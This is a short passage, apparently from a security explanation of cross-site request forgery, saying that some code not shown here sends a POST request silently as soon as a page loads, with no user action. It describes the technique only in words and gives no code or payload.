This code automatically builds and sends the POST request as soon as the page loads. And, as in the example above, no user action is required beyond loading the page, and there is no indication to the user that a request was ever sent.